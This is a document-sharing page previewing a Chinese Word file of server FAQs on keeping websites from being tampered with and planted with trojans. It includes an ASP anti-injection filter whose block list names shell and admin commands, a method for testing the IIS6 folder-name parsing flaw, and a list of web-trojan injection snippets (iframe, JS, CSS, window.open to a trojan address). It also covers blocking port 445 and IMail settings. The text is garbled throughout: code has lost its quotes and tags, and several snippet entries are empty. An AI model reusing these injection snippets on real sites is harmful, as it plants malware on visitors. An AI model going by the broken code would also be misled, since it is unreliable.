服务器常见问题备份搞.doc_第1页
服务器常见问题备份搞.doc_第2页
服务器常见问题备份搞.doc_第3页
服务器常见问题备份搞.doc_第4页
服务器常见问题备份搞.doc_第5页
已阅读5页,还剩6页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

首先说明一下,本文是网站/ 站长整理的如何防止网页被修改(嵌入iframe)一般这种问题是网站有漏洞,系统漏洞或者SQL注入漏洞,或者上传文件漏洞, 我也深受其苦,然而,如何防止网页被修改加入脚本病毒? 现将这个问题总结分享一下,1、简单的补救措施:在服务器IIS中,把所有的ASP,HTML文件的属性设置为Everyone只读(一般是IUSR_),只把数据库的权限设置成可写, 注意:如果你没有服务器的管理权限,那么登录上的空间ftp,选中那些不需要写入的文件或文件夹,右键点击-属性:把其中的三组写入权限都取消,但如果你有ACCESS数据库,要把数据库设成可写,不然读数据时会出错。2、先把恶意代码删掉(替换掉),然后把网站目录下的所有文件全部用杀软杀下 ,然后一个一个检查下是否存在后门.3、在你的程序里写上以下防注入函数on error resume next 这行代码放到conn.asp的第一行。防止注入dim qs,errc,iiiqs=request.servervariables(query_string)response.write(qs)dim deStr(18)deStr(0)=net userdeStr(1)=xp_cmdshelldeStr(2)=/adddeStr(3)=exec%20master.dbo.xp_cmdshelldeStr(4)=net localgroup administratorsdeStr(5)=selectdeStr(6)=countdeStr(7)=ascdeStr(8)=chardeStr(9)=middeStr(10)=deStr(11)=:deStr(12)=deStr(13)=insertdeStr(14)=deletedeStr(15)=dropdeStr(16)=truncatedeStr(17)=fromdeStr(18)=%errc=falsefor iii= 0 to ubound(deStr)if instr(qs,deStr(iii)0 thenerrc=trueend ifnextif errc thenResponse.Write(对不起,非法URL地址请求!)response.endend if4、在文件中加入= 以下为摘录=网页防篡改一,Stream开关可自由设置,ASP中的ADODB.Stream 对象用来操作二进制或文本数据的流。通常用于无组件上传和验证码等功能。关闭该组件可以提高网站安全。 Fso开关也可自由设置,FSO(FileSystemObject)是微软ASP的一个对文件操作的控件,该控件可以对服务器进行读取、新建、修改、删除目录以及文件的操作。关闭该组件有利于提高网站安全。二,假设网站建好后,今后一段时间都不会再用到ftp上传功能,这时可以暂时关闭FTP上传,有助于提高网站的安全,即使ftp密码泄露,黑客也不能操作空间内的文件,设置后60秒后生效。三,另外还可设置脚本权限与写入权限,如果网站只使用了asp,可设置为只开放asp权限。这样黑客即使上传了php的木马到空间也不能运行,最少的权限最大的安全。写入权限设置则系统支持全国领先的目录权限设置,允许关闭网站的写入权限,锁定虚拟主机。对安全有重要意义,例如可以将access数据库放在databases目录,而将wwwroot目录的写入 权限关闭,令asp木马根本无法上传,这样比关闭FSO更安全。如何防止网页被修改和挂马(2)一、对于网站被人恶意加上一段的代码而烦心不已。轻则导致访问者被迫访问某些网站或广告以至机器四机,重则被强制安装各种木马病毒,被盗取银行卡号密码,QQ密码等等。 1、在服务器上的防护。出现挂马现象与服务器漏洞有很大关系,打好补丁,禁止权限及封堵端口,对于扼杀挂马现象有很大的作用。2、,网站程序的设置。出于成本的考虑,现在很多小型企业及个人站长喜欢使用各种流行的CMS系统,这种CMS系统由于源代码开放,所以每隔一小段时间,总能有人找出其漏洞,通过漏洞植入木马。在ASP文件最后一行添加:response.end(),在PHP最后一行添加exit();即可。而在于文件头部植入的木马,因为添加在头部,服务器会直接将其发送到浏览器而不经任何处理。所以程序就派不上任何用场。这种情况的话那么就只能给予访客提醒,因为未经程序处理就发送了数据出去,我们在程序中是可以检测到的,我们只需要写一段程序,判断在自己的程序执行之前是否有数据被输送,如果已经输送则发送一个alert给浏览器,告知可能是木马。二、如何防止网站被挂马!1、为什么好好的网站会有木马?一般木马是来自ASP SHELL和PHP SHELL的程序段控制不严,程序上有上传功能,没有进行文件目录和文件后缀等的判断,一般这类的目录,以“海阳顶端网ASP木马”较为流行。因2003平台IIS6原因,也存在目录名问题引起ASP木马。( 微软的IIS 6存在严重解析文件名错误测试办法:在FTP中建立一个 test.asp 的文件夹,文件夹名就是 test.asp ,在这个文件夹中上传一个 hack.jpg,这个jpg的内容可以直接是,然后,用IE远程访问这个hack.jpg,你可以发现,它一样被当作是ASP文件来运行!显然,只要你的网站程序,允许用户自己建立文件夹及上传图片,黑客就可以上传图片来当作ASP木马来运行。解决办法:所有使用星外虚拟主机管理平台的虚拟主机用户,可以在主机面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限,就可以解决这个问题。可以参考其他公司的同类公告:)大家常用的动易2006和动网,BLOG这类的程序,需要详细的检查一下,并跟着开发者进行相应的安全程序升级。这样才能减少因代码原因引起的网站被黑。2、网站被黑了,如何检查是那些网页有问题呢。目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入iframe src=网站排名 这样的,需要使用查找程序来查找这类文件出来,手工删除此类插入的HTML代码。这项工作相对比较繁锁。需要仔细的查找。也会有一些木马是插入到js中,是js调用方式的。更详细的资料,请看后部分E.挂马代码大全。3、禁止写入和目录禁止执行的功能,二项功能组合,可以有效的防止ASP木马。这对于常被ASP木马影响的网站来说,会有一些帮助。4、防范ASP木马的十大基本原则由于ASP它本身是服务器提供的一贡服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求.几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧,特别是虚拟主机的用户都遇到过网页被篡改、数据被删除的经历,事后除了对这种行径深恶痛绝外,许多客户又苦于没有行之有效的防范措施。鉴于大部分网站入侵都是利用asp木马完成的,特写此文章以使普通虚拟主机用户能更好地了解、防范asp木马。也只有空间商和虚拟主机用户共同做好防范措施才可以有效防范asp木马!我们首先来说一下怎么样防范好了,说到防范我们自然要对asp木马的原理了,大道理我也不讲了,网上的文章有的是,简单的说asp木马其实就是用asp编写网站程序,甚至有些asp木马就是由asp网站管理程序修改而来的。就比如说我们常见的asp站长助手,等等它和其他asp程序没有本质区别,只要是能运行asp的空间就能运行它,这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间,并帮助入侵者控制目标空间的asp程序。严重的从而获取服务器管理员的权限,要想禁止asp木马运行就等于禁止asp的运行,显然这是行不通的,这也是为什么asp木马猖獗的原因!有人要问了,是不是就没有办法了呢,不,有办法的:第一:从源头入手,入侵者是怎么样上传asp木马的呢?一般哟几种方法,通过sql注射手段,获取管理员权限,通过备份数据库的功能将asp木马写入服务器。或者进入后台通过asp程序的上传功能的漏洞,上传木马等等,当然正常情况下,这些可以上传文件的asp程序都是有权限限制的,大多也限制了asp文件的上传。(比如:可以上传图片的新闻发布、图片管理程序,及可以上传更多类型文件的论坛程序等),如果我们直接上传asp木马的话,我们会发现,程序会有提示,是不直接上传的,但由于存在人为的asp设置错误及asp程序本身的漏洞,给了入侵者可乘之机,实现上传asp木马。因此,防范asp木马的重点就在于虚拟主机用户如何确保自己空间中asp上传程序的安全上,如果你是用别人的程序的话,尽量用出名一点的大型一点的程序,这样漏洞自然就少一些,而且尽量使用最新的版本,并且要经常去官方网站查看新版本或者是最新补丁,还有就是那些数据库默认路径呀,管理员密码默认呀,一定要改,形成习惯保证程序的安全性。那么如果你是程序员的话,我还想说的一点就是我们在网站程序上也应该尽量从安全的角度上编写涉及用户名与口令的程序最好封装在服务器端,尽量少的在ASP文件里出现,涉及到与数据库连接地用户名与口令应给予最小的权限; 需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。防止ASP主页.inc文件泄露问题; 防止UE等编辑器生成some.asp.bak文件泄露问题等等特别是上传功能一定要特别注意上面的只是对客户的一些要求,但是空间商由于无法预见虚拟主机用户会在自己站点中上传什么样的程序,以及每个程序是否存在漏洞,因此无法防止入侵者利用站点中客户程序本身漏洞上传asp木马的行为。空间商只能防止入侵者利用已被入侵的站点再次入侵同一服务器上其他站点的行为。这也更加说明要防范asp木马,虚拟主机用户就要对自己的程序严格把关! 为此我总结了ASP木马防范的十大原则供大家参考:1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。网站排名:2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。这其中包括各种新闻发布、商城及论坛程序,只要可以上传文件的asp都要进行身份认证!3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。5、要尽量保持程序是最新版本。上海网站建设6、不要在网页上加注后台管理程序登陆页面的链接。7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。8、要时常备份数据库等重要文件。9、日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换一分安全!10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。重新上传文件前,所有asp程序用户名和密码都要重置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。做好以上防范措施,您的网站只能说是相对安全了,决不能因此疏忽大意,因为入侵与反入侵是一场永恒的战争E.挂马代码大全ps:检查文件是否被挂马的时候可以参考下!进出口贸易一:框架挂马二:js文件挂马首先将以下代码document.write();保存为xxx.js,则JS挂马代码为三:js变形加密;muma.txt可改成任意后缀四:body挂马五:隐蔽挂马top.document.body.innerHTML = top.document.body.innerHTML + rn;六:css中挂马body background-image: url(javascript:document.write(;)七:JAJA挂马window.open (地址,toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1);八:图片伪装上海网页设计九:伪装调用:十:高级欺骗 页面要显示的内容 function www_163_com ()var url=网马地址;open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10);expression是可以执行JS脚本的哈。语法格式如下二种:标记固有的CSS属性名:expression(JS表达式);或 自定义属性名:expression(JS表达式);在这里我们选择第二种,代码应该大致是这样ifram ev:expression(JS表达式);接下来的问题是如何销毁网页里所有的ifra me对象;使用JS实现的原理是这样的:使ifra me里的请求地址变成空白页(about:blank),再将ifra me对象从DOM(文档对象模型)中移除就可以切断所有ifr ame里的请求了。移除DOM节点的方法比较多,我这里就用 outerHTML这个属性吧。CSS代码如下:ifra mev:expression(this.src=about:blank,this.outerHTML=);说明:前面的v字是灵儿自己定义的一个CSS属性,这里的this代表所有将要描述外观的ifra me对象,中间的逗号代表二句代码一起执行,没有执行优先顺序,这可是强有力的保证噢。about:blank代表空白页,大家都知道的。outerHTML属性是DOM对象包含自身的HTML代码,而innerHTML则是DOM对象(不含本身)里面所包含的HTML代码。爽快,代码写好了,就让我信来测试一下有没有效果。首先,新建一个网页,插入以上的CSS代码(或在您现有的CSS代码里加入上面那句):本帖相关代码i framev:expression(this.src=about:blank,this.outerHTML=); 然后在这个页面插入几个I FRAME代码,假设它们是被挂的木马网页。代码如下:网站 网站二保存为noifra me.htm,打开浏览器测试一下(本地测试需要启用顶部禁用的脚本的提示条哦)。我这里使用抓包工具来测试,不过也没有必要使用抓包工具,一个最简单有效的方法是打开IE的缓存文件夹,先清空它,再刷新这个页面,看看缓存文件夹里有没有这三个网站里的文件。如果没有,说明没有任何请求结果被返回测试结果是令人满意的,我的脸上有些微笑 *,这时同事递给我一块饼,蛮好吃的。提示:Windows XP SP2的缓存文件夹位置C:Documents and SettingsAdministratorLocalSettingsTemporary Internet Files细心的朋友发现问题来了,如果我自己的网页里要使用ifra me这个东东怎么办?答:如果要使自己的ifra me显示在网页里,而别人挂的I FRAME马都不起作用,在CSS里加一个本帖相关代码#haoexev:expression() !important对应的I FRAME代码为: 就OK了。提示:IE7中优先执行标注有!important描述的样式,IE6不认识!important,采用就近原则,所以IE6的这个代码放在CSS的最后就可以了。这里的f126,有很多朋友有疑问,他们问我为什么取f126,我这样回答这个f126是随意取的,只要下面的ifra me里的ID属性和CSS里的一致就行了。BBSGOOD用户加在后台CSS样式文件编辑器中,如果自己不用ifr ame,可以直接加入以下语句如何删除无法删除的文件如:aux文件夹在命令提示符下执行:RD /S /Q ?D:45612catalog.wci无法删除的问题C:FPSE_searchcatalog.wciC:System Volume Informationcatalog.wci,C:Inetpubcatalog.wciX:System Volume Informationcatalog.wci, 时间久了,你会发现这几个文件会越来越大,占了你很大的空间,那么这些可以删掉么!答案是可以的! 这个目录是WINDOWS对于大硬盘搜索方便的索引记录文件!会在WINDOWS空闲时自动记录,所以这个文件夹会越来越大,然后PF使用率不断上升,导致机器卡住!我们可以禁用这个自动索引功能哦! 开始菜单-搜索-文件或文件夹-更改首选项-不使用制作索引服务-不,不要启用制作索引服务(N)-改变制作索引服务设置(高级)(I)-跳出一个窗口(索引服务),把窗口中的那些索引服务删除-关闭刚才跳出的窗口(索引服务)-确定!445端口445端口是一个毁誉参半的端口,他和139端口一起是IPC$入侵的主要通道。有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉!我们所能做的就是想办法不让黑客有机可乘,封堵住445端口漏洞。 关闭445端口 关闭445端口的方法有很多,但是我比较推荐以下这种方法: 修改注册表,添加一个键值 Hive: HKEY_LOCAL_MACHINE Key: SystemCurrentControlSetServicesNetBTParameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 0 修改完后重启机器,运行“netstat -an”,你将会发现你的445端口已经不再Listening了。检测邮局解析成功命令Nslookup+域名imail邮局只能发不能收问题1 邮局的dns设置 (查看本地联接的dns和服务器的IP两个中间用“”空格开)2 杀毒过滤问题改变了本机的IP地址后. 则必须对IMail的原设置作相应的变更。改变了本机的IP地址后. 一、概述: 1、如果改变了本机的IP地址,则必须对IMail的原设置作相应的变更。 2、本文主要通过修改注册表来实现。 3、例如,本机原来的IP地址为“0”,在IMail中的其对应的邮件主机名为“”,别名为“”,现在本机的IP地址改成了“”。 二、具体操作: 1、打开注册表编辑器。选“开始运行:regedit”。 2、找到IMail的域名存让地。选“HKEY_LOCAL_MACHINESoftwareIpswitchIMailDomains”。 3、将旧的IP地址改成新的IP地址。选“0右键重命名”,然后改成新的IP地址“”。如下图: 4、将主机对应的旧的IP地址改成对应到新的IP地址。选“右边窗口Address双击”,再改成新的IP地址“”。如下图: 5、进入“IMail Administrator”,把“SMTP”服务“Stop”再“Start”后,修改即生效。如下图: 三、说明: 1、不要忘了

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论